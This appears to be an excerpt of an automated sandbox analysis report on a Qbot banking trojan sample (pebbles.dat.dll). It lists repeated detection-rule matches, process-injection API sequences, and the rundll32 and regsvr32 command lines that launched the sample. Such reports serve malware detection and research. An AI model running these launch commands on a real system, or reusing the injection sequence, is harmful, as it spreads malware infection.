          Source: 8.0.wermgr.exe.2d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.3140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.2.rundll32.exe.4a60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.3160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.2.wermgr.exe.2d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0317676F3_2_0317676F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031763B03_2_031763B0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031782A03_2_031782A0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031735EE3_2_031735EE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031729E93_2_031729E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0347676F4_2_0347676F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_034763B04_2_034763B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_034782A04_2_034782A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_034735EE4_2_034735EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_034729E94_2_034729E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,3_2_0316D538
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0316D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,3_2_0316D9DE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0346D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,4_2_0346D538
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0346D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,4_2_0346D9DE
          Source: pebbles.dat.dll.9.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: pebbles.dat.dll.9.drStatic PE information: Data appended to the last section found
          Source: pebbles.dat.dllReversingLabs: Detection: 16%
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
